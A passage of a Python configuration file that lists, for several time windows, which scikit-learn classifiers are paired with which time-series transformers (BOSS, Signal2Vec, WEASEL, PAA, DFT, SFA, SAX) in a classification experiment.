TransformerFactory.build_signal2vec(SAVED_MODEL, PATH_SIGNAL2VEC, num_of_vectors=10)
]
},
WEASEL : {
CLF_MODELS : [
MLPClassifier(hidden_layer_sizes=(100,), learning_rate='adaptive', solver='adam'),
MLPClassifier(hidden_layer_sizes=(1000,), learning_rate='adaptive', solver='adam', activation='logistic'),
MLPClassifier(hidden_layer_sizes=(100,), learning_rate='adaptive', solver='adam', activation='logistic'),
MLPClassifier(hidden_layer_sizes=(100, 100, 100), learning_rate='adaptive', solver='adam')
],
TRANSFORMER_MODELS: [
TransformerFactory.build_pyts_weasel(word_size=2, n_bins=4, norm_mean=False, norm_std=False),
TransformerFactory.build_pyts_weasel(word_size=2, n_bins=4, norm_mean=False, norm_std=False),
TransformerFactory.build_pyts_weasel(word_size=2, n_bins=4, norm_mean=False, norm_std=False),
TransformerFactory.build_pyts_weasel(word_size=2, n_bins=4, norm_mean=False, norm_std=False)
]
},
PAA : {
CLF_MODELS : [
ExtraTreesClassifier(n_jobs=-1, n_estimators=200),
ExtraTreesClassifier(n_jobs=-1, n_estimators=1000),
ExtraTreesClassifier(n_jobs=-1, n_estimators=2000),
ExtraTreesClassifier(n_jobs=-1, n_estimators=500)
],
TRANSFORMER_MODELS: [
TransformerFactory.build_tslearn_paa(n_paa_segments=10, supports_approximation=True),
TransformerFactory.build_tslearn_paa(n_paa_segments=10, supports_approximation=True),
TransformerFactory.build_tslearn_paa(n_paa_segments=10, supports_approximation=True),
TransformerFactory.build_tslearn_paa(n_paa_segments=10, supports_approximation=True)
]
},
DFT : {
CLF_MODELS : [
ExtraTreesClassifier(n_jobs=-1, n_estimators=200),
ExtraTreesClassifier(n_jobs=-1, n_estimators=1000),
ExtraTreesClassifier(n_jobs=-1, n_estimators=2000),
ExtraTreesClassifier(n_jobs=-1, n_estimators=500)
],
TRANSFORMER_MODELS: [
TransformerFactory.build_pyts_dft(n_coefs=10, norm_mean=False, norm_std=False,
supports_approximation=True),
TransformerFactory.build_pyts_dft(n_coefs=10, norm_mean=False, norm_std=False,
supports_approximation=True),
TransformerFactory.build_pyts_dft(n_coefs=10, norm_mean=False, norm_std=False,
supports_approximation=True),
TransformerFactory.build_pyts_dft(n_coefs=10, norm_mean=False, norm_std=False,
supports_approximation=True)
]
},
SFA : {
CLF_MODELS : [
ExtraTreesClassifier(n_jobs=-1, n_estimators=500),
ExtraTreesClassifier(n_jobs=-1, n_estimators=2000),
ExtraTreesClassifier(n_jobs=-1, n_estimators=1000),
MLPClassifier(hidden_layer_sizes=(1000, 100), learning_rate='adaptive', solver='adam'),
],
TRANSFORMER_MODELS: [
TransformerFactory.build_pyts_sfa(n_coefs=10, n_bins=9, norm_mean=False, norm_std=False),
TransformerFactory.build_pyts_sfa(n_coefs=10, n_bins=9, norm_mean=False, norm_std=False),
TransformerFactory.build_pyts_sfa(n_coefs=10, n_bins=9, norm_mean=False, norm_std=False),
TransformerFactory.build_pyts_sfa(n_coefs=10, n_bins=9, norm_mean=False, norm_std=False)
]
},
SAX1D : {
CLF_MODELS : [
MLPClassifier(hidden_layer_sizes=(1000,), learning_rate='adaptive', solver='adam'),
ExtraTreeClassifier(),
ExtraTreeClassifier(),
ExtraTreesClassifier(n_jobs=-1, n_estimators=100)
],
TRANSFORMER_MODELS: [
TransformerFactory.build_tslearn_one_d_sax(n_paa_segments=50, n_sax_symbols=20),
TransformerFactory.build_tslearn_one_d_sax(n_paa_segments=50, n_sax_symbols=20),
TransformerFactory.build_tslearn_one_d_sax(n_paa_segments=50, n_sax_symbols=10),
TransformerFactory.build_tslearn_one_d_sax(n_paa_segments=50, n_sax_symbols=50)
]
},
SAX : {
CLF_MODELS : [
MLPClassifier(hidden_layer_sizes=(1000,), learning_rate='adaptive', solver='adam'),
MLPClassifier(hidden_layer_sizes=(100,), learning_rate='adaptive', solver='adam'),
MLPClassifier(hidden_layer_sizes=(100,), learning_rate='adaptive', solver='adam'),
MLPClassifier(hidden_layer_sizes=(1000, 100), learning_rate='adaptive', solver='adam')
],
TRANSFORMER_MODELS: [
TransformerFactory.build_tslearn_sax(n_paa_segments=50, n_sax_symbols=50, supports_approximation=True),
TransformerFactory.build_tslearn_sax(n_paa_segments=50, n_sax_symbols=10, supports_approximation=True),
TransformerFactory.build_tslearn_sax(n_paa_segments=20, n_sax_symbols=50, supports_approximation=True),
TransformerFactory.build_tslearn_sax(n_paa_segments=20, n_sax_symbols=10, supports_approximation=True)
]
}
}
selected_models_8h = {
BOSS : {
CLF_MODELS : [
MLPClassifier(hidden_layer_sizes=(2000, 100), learning_rate='adaptive', solver='adam',
activation='logistic'),
MLPClassifier(hidden_layer_sizes=(1000,), learning_rate='adaptive', solver='adam', activation='logistic'),
MLPClassifier(hidden_layer_sizes=(2000, 100), learning_rate='adaptive', solver='adam',
activation='logistic'),
MLPClassifier(hidden_layer_sizes=(1000, 100), learning_rate='adaptive', solver='adam',
activation='logistic')
],
TRANSFORMER_MODELS: [
TransformerFactory.build_pyts_boss(word_size=2, n_bins=20, window_size=10, norm_mean=False,
norm_std=False),
TransformerFactory.build_pyts_boss(word_size=2, n_bins=20, window_size=10, norm_mean=False,
norm_std=False),
TransformerFactory.build_pyts_boss(word_size=4, n_bins=10, window_size=10, norm_mean=False,
norm_std=False),
TransformerFactory.build_pyts_boss(word_size=4, n_bins=10, window_size=10, norm_mean=False,
norm_std=False)
]
},
SIGNAL2VEC: {
CLF_MODELS : [
MLPClassifier(hidden_layer_sizes=(2000, 100), learning_rate='adaptive', solver='adam'),
MLPClassifier(hidden_layer_sizes=(100, 100, 100), learning_rate='adaptive', solver='adam'),
MLPClassifier(hidden_layer_sizes=(1000, 100), learning_rate='adaptive', solver='adam'),
MLPClassifier(hidden_layer_sizes=(1000,), learning_rate='adaptive', solver='adam', activation='logistic')
],
TRANSFORMER_MODELS: [
TransformerFactory.build_signal2vec(SAVED_MODEL, PATH_SIGNAL2VEC, num_of_vectors=50),
TransformerFactory.build_signal2vec(SAVED_MODEL, PATH_SIGNAL2VEC, num_of_vectors=4),
TransformerFactory.build_signal2vec(SAVED_MODEL, PATH_SIGNAL2VEC, num_of_vectors=1),
TransformerFactory.build_signal2vec(SAVED_MODEL, PATH_SIGNAL2VEC, num_of_vectors=5)
]
},
WEASEL : {
CLF_MODELS : [
MLPClassifier(hidden_layer_sizes=(2000), learning_rate='adaptive', solver='adam', activation='logistic'),
MLPClassifier(hidden_layer_sizes=(100, 100, 100), learning_rate='adaptive', solver='adam'),
MLPClassifier(hidden_layer_sizes=(2000, 100, 100), learning_rate='adaptive', solver='adam'),
MLPClassifier(hidden_layer_sizes=(100, 100), learning_rate='adaptive', solver='adam')
],
TRANSFORMER_MODELS: [
TransformerFactory.build_pyts_weasel(word_size=2, n_bins=4, norm_mean=False, norm_std=False),
TransformerFactory.build_pyts_weasel(word_size=2, n_bins=4, norm_mean=False, norm_std=False),
TransformerFactory.build_pyts_weasel(word_size=2, n_bins=4, norm_mean=False, norm_std=False),
TransformerFactory.build_pyts_weasel(word_size=2, n_bins=4, norm_mean=False, norm_std=False)
]
},
PAA : {
CLF_MODELS : [
ExtraTreesClassifier(n_jobs=-1, n_estimators=1000),
ExtraTreesClassifier(n_jobs=-1, n_estimators=500),
ExtraTreesClassifier(n_jobs=-1, n_estimators=2000),
ExtraTreesClassifier(n_jobs=-1, n_estimators=200)
],
TRANSFORMER_MODELS: [
TransformerFactory.build_tslearn_paa(n_paa_segments=10, supports_approximation=True),
TransformerFactory.build_tslearn_paa(n_paa_segments=10, supports_approximation=True),
TransformerFactory.build_tslearn_paa(n_paa_segments=10, supports_approximation=True),
TransformerFactory.build_tslearn_paa(n_paa_segments=10, supports_approximation=True)
]
},
DFT : {
CLF_MODELS : [
ExtraTreesClassifier(n_jobs=-1, n_estimators=500),
RandomForestClassifier(n_jobs=-1, n_estimators=100),
ExtraTreesClassifier(n_jobs=-1, n_estimators=100),
ExtraTreesClassifier(n_jobs=-1, n_estimators=2000)
],
TRANSFORMER_MODELS: [
TransformerFactory.build_pyts_dft(n_coefs=10, norm_mean=False, norm_std=False,
supports_approximation=True),
TransformerFactory.build_pyts_dft(n_coefs=10, norm_mean=False, norm_std=False,
supports_approximation=True),
TransformerFactory.build_pyts_dft(n_coefs=10, norm_mean=False, norm_std=False,
supports_approximation=True),
TransformerFactory.build_pyts_dft(n_coefs=10, norm_mean=False, norm_std=False,
supports_approximation=True)
]
},
SFA : {
CLF_MODELS : [
MLPClassifier(hidden_layer_sizes=(100, 50, 100, 50), learning_rate='adaptive', solver='adam'),
MLPClassifier(hidden_layer_sizes=(100, 100, 100), learning_rate='adaptive', solver='adam'),
MLPClassifier(hidden_layer_sizes=(1000,), learning_rate='adaptive', solver='adam'),
MLPClassifier(hidden_layer_sizes=(2000), learning_rate='adaptive', solver='adam')
],
TRANSFORMER_MODELS: [
TransformerFactory.build_pyts_sfa(n_coefs=10, n_bins=5, norm_mean=False, norm_std=False),
TransformerFactory.build_pyts_sfa(n_coefs=10, n_bins=5, norm_mean=False, norm_std=False),
TransformerFactory.build_pyts_sfa(n_coefs=10, n_bins=5, norm_mean=False, norm_std=False),
TransformerFactory.build_pyts_sfa(n_coefs=10, n_bins=5, norm_mean=False, norm_std=False)
]
},
SAX1D : {
CLF_MODELS : [
MLPClassifier(hidden_layer_sizes=(100, 50, 100, 50), learning_rate='adaptive', solver='adam'),
MLPClassifier(hidden_layer_sizes=(100, 100), learning_rate='adaptive', solver='adam'),
MLPClassifier(hidden_layer_sizes=(2000), learning_rate='adaptive', solver='adam'),
MLPClassifier(hidden_layer_sizes=(1000,), learning_rate='adaptive', solver='adam')
],
TRANSFORMER_MODELS: [
TransformerFactory.build_tslearn_one_d_sax(n_paa_segments=50, n_sax_symbols=10),
TransformerFactory.build_tslearn_one_d_sax(n_paa_segments=50, n_sax_symbols=10),
TransformerFactory.build_tslearn_one_d_sax(n_paa_segments=50, n_sax_symbols=10),
TransformerFactory.build_tslearn_one_d_sax(n_paa_segments=50, n_sax_symbols=20)
]
},
SAX : {
CLF_MODELS : [
MLPClassifier(hidden_layer_sizes=(2000, 100), learning_rate='adaptive', solver='adam'),
MLPClassifier(hidden_layer_sizes=(2000), learning_rate='adaptive', solver='adam'),
MLPClassifier(hidden_layer_sizes=(2000, 100), learning_rate='adaptive', solver='adam'),
MLPClassifier(hidden_layer_sizes=(2000), learning_rate='adaptive', solver='adam')
],
TRANSFORMER_MODELS: [
TransformerFactory.build_tslearn_sax(n_paa_segments=50, n_sax_symbols=100, supports_approximation=False),
TransformerFactory.build_tslearn_sax(n_paa_segments=50, n_sax_symbols=10, supports_approximation=False),
TransformerFactory.build_tslearn_sax(n_paa_segments=10, n_sax_symbols=20, supports_approximation=False),
TransformerFactory.build_tslearn_sax(n_paa_segments=50, n_sax_symbols=20, supports_approximation=True)
]
}
}
selected_models_1h = {
BOSS : {
CLF_MODELS : [
MLPClassifier(hidden_layer_sizes=(100, 100, 100), learning_rate='adaptive', solver='adam',
activation='logistic'),
MLPClassifier(hidden_layer_sizes=(2000, 100, 100), learning_rate='adaptive', solver='adam',
activation='logistic'),
MLPClassifier(hidden_layer_sizes=(2000, 100), learning_rate='adaptive', solver='adam',
activation='logistic'),
MLPClassifier(hidden_layer_sizes=(1000, 100), learning_rate='adaptive', solver='adam',
activation='logistic')
],
TRANSFORMER_MODELS: [
TransformerFactory.build_pyts_boss(word_size=4, n_bins=20, window_size=10, norm_mean=False,
norm_std=False),
TransformerFactory.build_pyts_boss(word_size=2, n_bins=20, window_size=10, norm_mean=False,
norm_std=False),
TransformerFactory.build_pyts_boss(word_size=2, n_bins=20, window_size=10, norm_mean=False,
norm_std=False),
TransformerFactory.build_pyts_boss(word_size=2, n_bins=20, window_size=10, norm_mean=False,
norm_std=False)
]
},
SIGNAL2VEC: {
CLF_MODELS : [
MLPClassifier(hidden_layer_sizes=(1000, 100), learning_rate='adaptive', solver='adam',
activation='logistic'),
MLPClassifier(hidden_layer_sizes=(1000, 100), learning_rate='adaptive', solver='adam',
activation='logistic'),
MLPClassifier(hidden_layer_sizes=(2000, 100), learning_rate='adaptive', solver='adam',
activation='logistic'),
MLPClassifier(hidden_layer_sizes=(1000, 100), learning_rate='adaptive', solver='adam',
activation='logistic')
],
TRANSFORMER_MODELS: [
TransformerFactory.build_signal2vec(SAVED_MODEL, PATH_SIGNAL2VEC, num_of_vectors=2),
TransformerFactory.build_signal2vec(SAVED_MODEL, PATH_SIGNAL2VEC, num_of_vectors=4),
TransformerFactory.build_signal2vec(SAVED_MODEL, PATH_SIGNAL2VEC, num_of_vectors=4),
TransformerFactory.build_signal2vec(SAVED_MODEL, PATH_SIGNAL2VEC, num_of_vectors=1)
]
},
WEASEL : {
CLF_MODELS : [
MLPClassifier(hidden_layer_sizes=(1000,), learning_rate='adaptive', solver='adam', activation='logistic'),
MLPClassifier(hidden_layer_sizes=(2000), learning_rate='adaptive', solver='adam', activation='logistic'),
MLPClassifier(hidden_layer_sizes=(100, 50, 100, 50), learning_rate='adaptive', solver='adam'),
MLPClassifier(hidden_layer_sizes=(100,), learning_rate='adaptive', solver='adam', activation='logistic')
],
TRANSFORMER_MODELS: [
TransformerFactory.build_pyts_weasel(word_size=2, n_bins=4, norm_mean=False, norm_std=False),
TransformerFactory.build_pyts_weasel(word_size=2, n_bins=4, norm_mean=False, norm_std=False),
TransformerFactory.build_pyts_weasel(word_size=2, n_bins=4, norm_mean=False, norm_std=False),
TransformerFactory.build_pyts_weasel(word_size=2, n_bins=4, norm_mean=False, norm_std=False)
]
},
PAA : {
CLF_MODELS : [
MLPClassifier(hidden_layer_sizes=(100, 100, 100), learning_rate='adaptive', solver='adam'),
MLPClassifier(hidden_layer_sizes=(2000, 100, 100), learning_rate='adaptive', solver='adam'),
ExtraTreesClassifier(n_jobs=-1, n_estimators=100),
MLPClassifier(hidden_layer_sizes=(100, 50, 100, 50), learning_rate='adaptive', solver='adam')
],
TRANSFORMER_MODELS: [
TransformerFactory.build_tslearn_paa(n_paa_segments=10, supports_approximation=True),
TransformerFactory.build_tslearn_paa(n_paa_segments=10, supports_approximation=True),
TransformerFactory.build_tslearn_paa(n_paa_segments=10, supports_approximation=True),
TransformerFactory.build_tslearn_paa(n_paa_segments=10, supports_approximation=True)
]
},
DFT : {
CLF_MODELS : [
ExtraTreesClassifier(n_jobs=-1, n_estimators=100),
RandomForestClassifier(n_jobs=-1, n_estimators=100),
ExtraTreesClassifier(n_jobs=-1, n_estimators=500),
ExtraTreesClassifier(n_jobs=-1, n_estimators=1000)
],
TRANSFORMER_MODELS: [
TransformerFactory.build_pyts_dft(n_coefs=10, norm_mean=False, norm_std=False,
supports_approximation=True),
TransformerFactory.build_pyts_dft(n_coefs=10, norm_mean=False, norm_std=False,
supports_approximation=True),
TransformerFactory.build_pyts_dft(n_coefs=10, norm_mean=False, norm_std=False,
supports_approximation=True),
TransformerFactory.build_pyts_dft(n_coefs=10, norm_mean=False, norm_std=False,
supports_approximation=True),
]
},
SFA : {
CLF_MODELS : [
MLPClassifier(hidden_layer_sizes=(2000, 100, 100), learning_rate='adaptive', solver='adam'),
MLPClassifier(hidden_layer_sizes=(1000, 2000, 100), learning_rate='adaptive', solver='adam'),
MLPClassifier(hidden_layer_sizes=(2000, 100), learning_rate='adaptive', solver='adam'),
MLPClassifier(hidden_layer_sizes=(1000, 100), learning_rate='adaptive', solver='adam')
],
TRANSFORMER_MODELS: [
TransformerFactory.build_pyts_sfa(n_coefs=10, n_bins=5, norm_mean=False, norm_std=False),
TransformerFactory.build_pyts_sfa(n_coefs=10, n_bins=5, norm_mean=False, norm_std=False),
TransformerFactory.build_pyts_sfa(n_coefs=10, n_bins=5, norm_mean=False, norm_std=False),
TransformerFactory.build_pyts_sfa(n_coefs=10, n_bins=5, norm_mean=False, norm_std=False)
]
},
SAX1D : {
CLF_MODELS : [
ExtraTreesClassifier(n_jobs=-1, n_estimators=100),
ExtraTreesClassifier(n_jobs=-1, n_estimators=200),
RandomForestClassifier(n_jobs=-1, n_estimators=100),
ExtraTreesClassifier(n_jobs=-1, n_estimators=200)
],
TRANSFORMER_MODELS: [
TransformerFactory.build_tslearn_one_d_sax(n_paa_segments=50, n_sax_symbols=50),
TransformerFactory.build_tslearn_one_d_sax(n_paa_segments=50, n_sax_symbols=10),
TransformerFactory.build_tslearn_one_d_sax(n_paa_segments=50, n_sax_symbols=10),
TransformerFactory.build_tslearn_one_d_sax(n_paa_segments=50, n_sax_symbols=50)
]
},
SAX : {
CLF_MODELS : [
MLPClassifier(hidden_layer_sizes=(100,), learning_rate='adaptive', solver='adam'),
MLPClassifier(hidden_layer_sizes=(2000), learning_rate='adaptive', solver='adam'),
MLPClassifier(hidden_layer_sizes=(100, 100, 100), learning_rate='adaptive', solver='adam'),
MLPClassifier(hidden_layer_sizes=(1000,), learning_rate='adaptive', solver='adam'),
],
TRANSFORMER_MODELS: [
TransformerFactory.build_tslearn_sax(n_paa_segments=20, n_sax_symbols=10, supports_approximation=True),
TransformerFactory.build_tslearn_sax(n_paa_segments=20, n_sax_symbols=50, supports_approximation=True),
TransformerFactory.build_tslearn_sax(n_paa_segments=50, n_sax_symbols=10, supports_approximation=True),
TransformerFactory.build_tslearn_sax(n_paa_segments=50, n_sax_symbols=50, supports_approximation=True)
]
}
}
selected_models_2h = {
BOSS : {
CLF_MODELS : [
MLPClassifier(hidden_layer_sizes=(2000, 100), learning_rate='adaptive', solver='adam',
activation='logistic'),
MLPClassifier(hidden_layer_sizes=(1000, 100), learning_rate='adaptive', solver='adam',
activation='logistic'),
MLPClassifier(hidden_layer_sizes=(1000, 2000, 100), learning_rate='adaptive', solver='adam',
activation='logistic'),
MLPClassifier(hidden_layer_sizes=(100,), learning_rate='adaptive', solver='adam', activation='logistic')
],
TRANSFORMER_MODELS: [
TransformerFactory.build_pyts_boss(word_size=2, n_bins=20, window_size=10, norm_mean=False,
norm_std=False),
TransformerFactory.build_pyts_boss(word_size=2, n_bins=20, window_size=10, norm_mean=False,
norm_std=False),
TransformerFactory.build_pyts_boss(word_size=2, n_bins=20, window_size=10, norm_mean=False,
norm_std=False),
TransformerFactory.build_pyts_boss(word_size=2, n_bins=20, window_size=10, norm_mean=False,
norm_std=False)
]
},
SIGNAL2VEC: {
CLF_MODELS : [
MLPClassifier(hidden_layer_sizes=(2000, 100), learning_rate='adaptive', solver='adam',
activation='logistic'),
MLPClassifier(hidden_layer_sizes=(2000), learning_rate='adaptive', solver='adam', activation='logistic'),
MLPClassifier(hidden_layer_sizes=(1000, 100), learning_rate='adaptive', solver='adam',
activation='logistic'),
MLPClassifier(hidden_layer_sizes=(2000, 100), learning_rate='adaptive', solver='adam',
activation='logistic')
],
TRANSFORMER_MODELS: [
TransformerFactory.build_signal2vec(SAVED_MODEL, PATH_SIGNAL2VEC, num_of_vectors=4),
TransformerFactory.build_signal2vec(SAVED_MODEL, PATH_SIGNAL2VEC, num_of_vectors=4),
TransformerFactory.build_signal2vec(SAVED_MODEL, PATH_SIGNAL2VEC, num_of_vectors=4),
TransformerFactory.build_signal2vec(SAVED_MODEL, PATH_SIGNAL2VEC, num_of_vectors=5)
]
},
WEASEL : {
CLF_MODELS : [
MLPClassifier(hidden_layer_sizes=(2000), learning_rate='adaptive', solver='adam', activation='logistic'),
MLPClassifier(hidden_layer_sizes=(1000,), learning_rate='adaptive', solver='adam', activation='logistic'),
MLPClassifier(hidden_layer_sizes=(100, 50, 100, 50), learning_rate='adaptive', solver='adam'),
MLPClassifier(hidden_layer_sizes=(100,), learning_rate='adaptive', solver='adam', activation='logistic')
],
TRANSFORMER_MODELS: [
TransformerFactory.build_pyts_weasel(word_size=2, n_bins=4, norm_mean=False, norm_std=False),
TransformerFactory.build_pyts_weasel(word_size=2, n_bins=4, norm_mean=False, norm_std=False),
TransformerFactory.build_pyts_weasel(word_size=2, n_bins=4, norm_mean=False, norm_std=False),
TransformerFactory.build_pyts_weasel(word_size=2, n_bins=4, norm_mean=False, norm_std=False)
]
},
PAA : {
CLF_MODELS : [
MLPClassifier(hidden_layer_sizes=(100, 100, 100), learning_rate='adaptive', solver='adam'),
MLPClassifier(hidden_layer_sizes=(2000, 100, 100), learning_rate='adaptive', solver='adam'),
MLPClassifier(hidden_layer_sizes=(100, 50, 100, 50), learning_rate='adaptive', solver='adam'),
MLPClassifier(hidden_layer_sizes=(2000), learning_rate='adaptive', solver='adam', activation='logistic')
],
TRANSFORMER_MODELS: [
TransformerFactory.build_tslearn_paa(n_paa_segments=10, supports_approximation=True),
TransformerFactory.build_tslearn_paa(n_paa_segments=10, supports_approximation=True),
TransformerFactory.build_tslearn_paa(n_paa_segments=10, supports_approximation=True),
TransformerFactory.build_tslearn_paa(n_paa_segments=10, supports_approximation=True)
]
},
DFT : {
CLF_MODELS : [
],
TRANSFORMER_MODELS: [
TransformerFactory.build_pyts_dft(n_coefs=10, norm_mean=False, norm_std=False,
supports_approximation=True),
TransformerFactory.build_pyts_dft(n_coefs=10, norm_mean=False, norm_std=False,
supports_approximation=True),
TransformerFactory.build_pyts_dft(n_coefs=10, norm_mean=False, norm_std=False,
supports_approximation=True),
TransformerFactory.build_pyts_dft(n_coefs=10, norm_mean=False, norm_std=False,
supports_approximation=True)
]
},
SFA : {
CLF_MODELS : [
ExtraTreesClassifier(n_jobs=-1, n_estimators=500),
ExtraTreesClassifier(n_jobs=-1, n_estimators=2000),
RandomForestClassifier(n_jobs=-1, n_estimators=100),
ExtraTreesClassifier(n_jobs=-1, n_estimators=1000)
],
TRANSFORMER_MODELS: [
TransformerFactory.build_pyts_sfa(n_coefs=10, n_bins=5, norm_mean=False, norm_std=False),
TransformerFactory.build_pyts_sfa(n_coefs=10, n_bins=5, norm_mean=False, norm_std=False),
TransformerFactory.build_pyts_sfa(n_coefs=10, n_bins=5, norm_mean=False, norm_std=False),
TransformerFactory.build_pyts_sfa(n_coefs=10, n_bins=5, norm_mean=False, norm_std=False)
]
},
SAX1D : {
CLF_MODELS : [
ExtraTreesClassifier(n_jobs=-1, n_estimators=1000),
ExtraTreesClassifier(n_jobs=-1, n_estimators=2000),
ExtraTreesClassifier(n_jobs=-1, n_estimators=2000),
RandomForestClassifier(n_jobs=-1, n_estimators=100)
],
TRANSFORMER_MODELS: [
TransformerFactory.build_tslearn_one_d_sax(n_paa_segments=50, n_sax_symbols=10),
TransformerFactory.build_tslearn_one_d_sax(n_paa_segments=50, n_sax_symbols=10),
TransformerFactory.build_tslearn_one_d_sax(n_paa_segments=50, n_sax_symbols=20),
TransformerFactory.build_tslearn_one_d_sax(n_paa_segments=50, n_sax_symbols=20)
]
},
SAX : {
CLF_MODELS : [
MLPClassifier(hidden_layer_sizes=(2000), learning_rate='adaptive', solver='adam'),
MLPClassifier(hidden_layer_sizes=(1000, 100), learning_rate='adaptive', solver='adam'),
MLPClassifier(hidden_layer_sizes=(1000, 100), learning_rate='adaptive', solver='adam'),
MLPClassifier(hidden_layer_sizes=(2000, 100), learning_rate='adaptive', solver='adam')
],
TRANSFORMER_MODELS: [
TransformerFactory.build_tslearn_sax(n_paa_segments=50, n_sax_symbols=50, supports_approximation=True),
TransformerFactory.build_tslearn_sax(n_paa_segments=50, n_sax_symbols=10, supports_approximation=True),
TransformerFactory.build_tslearn_sax(n_paa_segments=50, n_sax_symbols=50, supports_approximation=True),
TransformerFactory.build_tslearn_sax(n_paa_segments=50, n_sax_symbols=50, supports_approximation=True)
]
}
}
selected_models_24h = {
BOSS : {
CLF_MODELS : [
MLPClassifier(hidden_layer_sizes=(2000), learning_rate='adaptive', solver='adam', activation='logistic'),
MLPClassifier(hidden_layer_sizes=(2000, 100), learning_rate='adaptive', solver='adam',
activation='logistic'),
MLPClassifier(hidden_layer_sizes=(2000), learning_rate='adaptive', solver='adam'),
MLPClassifier(hidden_layer_sizes=(2000), learning_rate='adaptive', solver='adam')
],
TRANSFORMER_MODELS: [
TransformerFactory.build_pyts_boss(word_size=4, n_bins=5, window_size=10, norm_mean=False, norm_std=False),
TransformerFactory.build_pyts_boss(word_size=4, n_bins=5, window_size=10, norm_mean=False, norm_std=False),
TransformerFactory.build_pyts_boss(word_size=4, n_bins=10, window_size=10, norm_mean=False,
norm_std=False),
TransformerFactory.build_pyts_boss(word_size=4, n_bins=5, window_size=10, norm_mean=False, norm_std=False)
]
},
SIGNAL2VEC: {
CLF_MODELS : [
MLPClassifier(hidden_layer_sizes=(1000, 100), learning_rate='adaptive', solver='adam'),
MLPClassifier(hidden_layer_sizes=(2000), learning_rate='adaptive', solver='adam'),
MLPClassifier(hidden_layer_sizes=(1000, 100), learning_rate='adaptive', solver='adam'),
MLPClassifier(hidden_layer_sizes=(2000, 100, 100), learning_rate='adaptive', solver='adam')
],
TRANSFORMER_MODELS: [
TransformerFactory.build_signal2vec(SAVED_MODEL, PATH_SIGNAL2VEC, num_of_vectors=4),
TransformerFactory.build_signal2vec(SAVED_MODEL, PATH_SIGNAL2VEC, num_of_vectors=4),
TransformerFactory.build_signal2vec(SAVED_MODEL, PATH_SIGNAL2VEC, num_of_vectors=5),
TransformerFactory.build_signal2vec(SAVED_MODEL, PATH_SIGNAL2VEC, num_of_vectors=2)
]
},
WEASEL : {
CLF_MODELS : [
],
TRANSFORMER_MODELS: [
]
},
PAA : {
CLF_MODELS : [
MLPClassifier(hidden_layer_sizes=(1000, 100), learning_rate='adaptive', solver='adam',
activation='logistic'),
MLPClassifier(hidden_layer_sizes=(2000), learning_rate='adaptive', solver='adam', activation='logistic'),
MLPClassifier(hidden_layer_sizes=(1000,), learning_rate='adaptive', solver='adam', activation='logistic'),
MLPClassifier(hidden_layer_sizes=(2000, 100), learning_rate='adaptive', solver='adam',
activation='logistic')
],
TRANSFORMER_MODELS: [
TransformerFactory.build_tslearn_paa(n_paa_segments=10, supports_approximation=True),
TransformerFactory.build_tslearn_paa(n_paa_segments=10, supports_approximation=True),
TransformerFactory.build_tslearn_paa(n_paa_segments=10, supports_approximation=True),
TransformerFactory.build_tslearn_paa(n_paa_segments=10, supports_approximation=True)
]
},
DFT : {
CLF_MODELS : [
ExtraTreesClassifier(n_jobs=-1, n_estimators=100),
ExtraTreesClassifier(n_jobs=-1, n_estimators=2000),
ExtraTreesClassifier(n_jobs=-1, n_estimators=500),
ExtraTreesClassifier(n_jobs=-1, n_estimators=200)
],
TRANSFORMER_MODELS: [
TransformerFactory.build_pyts_dft(n_coefs=10, norm_mean=False, norm_std=False,
supports_approximation=True),
TransformerFactory.build_pyts_dft(n_coefs=10, norm_mean=False, norm_std=False,
supports_approximation=True),
TransformerFactory.build_pyts_dft(n_coefs=10, norm_mean=False, norm_std=False,
supports_approximation=True),
TransformerFactory.build_pyts_dft(n_coefs=10, norm_mean=False, norm_std=False,
supports_approximation=True)
]
},
SFA : {
CLF_MODELS : [
MLPClassifier(hidden_layer_sizes=(100,), learning_rate='adaptive', solver='adam'),
ExtraTreesClassifier(n_jobs=-1, n_estimators=1000),
RandomForestClassifier(n_jobs=-1, n_estimators=200),
ExtraTreesClassifier(n_jobs=-1, n_estimators=100)
],
TRANSFORMER_MODELS: [
TransformerFactory.build_pyts_sfa(n_coefs=10, n_bins=5, norm_mean=False, norm_std=False),
TransformerFactory.build_pyts_sfa(n_coefs=10, n_bins=5, norm_mean=False, norm_std=False),
TransformerFactory.build_pyts_sfa(n_coefs=10, n_bins=5, norm_mean=False, norm_std=False),
TransformerFactory.build_pyts_sfa(n_coefs=10, n_bins=5, norm_mean=False, norm_std=False)
]
},
SAX1D : {
CLF_MODELS : [
MLPClassifier(hidden_layer_sizes=(1000,), learning_rate='adaptive', solver='adam', activation='logistic'),
MLPClassifier(hidden_layer_sizes=(2000), learning_rate='adaptive', solver='adam', activation='logistic'),
MLPClassifier(hidden_layer_sizes=(2000), learning_rate='adaptive', solver='adam', activation='logistic'),
MLPClassifier(hidden_layer_sizes=(1000,), learning_rate='adaptive', solver='adam', activation='logistic')
],
TRANSFORMER_MODELS: [
TransformerFactory.build_tslearn_one_d_sax(n_paa_segments=50, n_sax_symbols=10),
TransformerFactory.build_tslearn_one_d_sax(n_paa_segments=50, n_sax_symbols=20),
TransformerFactory.build_tslearn_one_d_sax(n_paa_segments=50, n_sax_symbols=50),
TransformerFactory.build_tslearn_one_d_sax(n_paa_segments=50, n_sax_symbols=100)
]
},
SAX : {
CLF_MODELS : [
MLPClassifier(hidden_layer_sizes=(100, 100, 100), learning_rate='adaptive', solver='adam'),
MLPClassifier(hidden_layer_sizes=(2000, 100), learning_rate='adaptive', solver='adam'),
MLPClassifier(hidden_layer_sizes=(100, 100), learning_rate='adaptive', solver='adam'),
MLPClassifier(hidden_layer_sizes=(2000), learning_rate='adaptive', solver='adam')
],
TRANSFORMER_MODELS: [
TransformerFactory.build_tslearn_sax(n_paa_segments=50, n_sax_symbols=10, supports_approximation=True),
TransformerFactory.build_tslearn_sax(n_paa_segments=20, n_sax_symbols=50, supports_approximation=True),
TransformerFactory.build_tslearn_sax(n_paa_segments=20, n_sax_symbols=10, supports_approximation=True),
TransformerFactory.build_tslearn_sax(n_paa_segments=20, n_sax_symbols=50, supports_approximation=True)
]
}
}
model_selection_clf_list = [
MLPClassifier(hidden_layer_sizes=(1000,), learning_rate='adaptive', solver='adam',
activation='logistic'),
MLPClassifier(hidden_layer_sizes=(1000, 100), learning_rate='adaptive', solver='adam',
activation='logistic'),
MLPClassifier(hidden_layer_sizes=(2000), learning_rate='adaptive', solver='adam',
activation='logistic')
]
model_selection_transformers = [
TransformerFactory.build_pyts_boss(word_size=2, n_bins=5, window_size=10, norm_mean=False, norm_std=False),
TransformerFactory.build_signal2vec(SAVED_MODEL, PATH_SIGNAL2VEC, num_of_vectors=2),
